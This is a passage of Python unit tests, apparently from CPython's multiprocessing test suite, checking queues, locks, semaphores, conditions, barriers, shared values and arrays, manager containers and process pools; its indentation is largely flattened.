if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
        # Currently fails on macOS
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
        # Removed temporarily due to API shear: this does not
        # work with threading._Event objects (is_set == isSet).
self.assertEqual(event.is_set(), False)
        # Removed: threading.Event.wait() returns the value of the __flag
        # instead of None.  API shear with the semaphore-backed mp.Event.
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
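# A minimal usage sketch of _DummyList (illustrative only, not executed by
# the test suite):
#
#     counter = _DummyList()
#     counter.append(True)        # atomically increments the shared integer
#     assert len(counter) == 1    # reads the count back under the lock
#
# Because the counter lives in a shared-memory buffer guarded by a Lock, it
# can be handed to child processes without needing a manager process.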
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
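# exception_throwing_generator(total, when) yields 0..total-1 but raises
# SayWhenError once i == when (or immediately if when == -1); the _TestPool
# error-handling tests below feed it to map()/imap()/imap_unordered().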
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
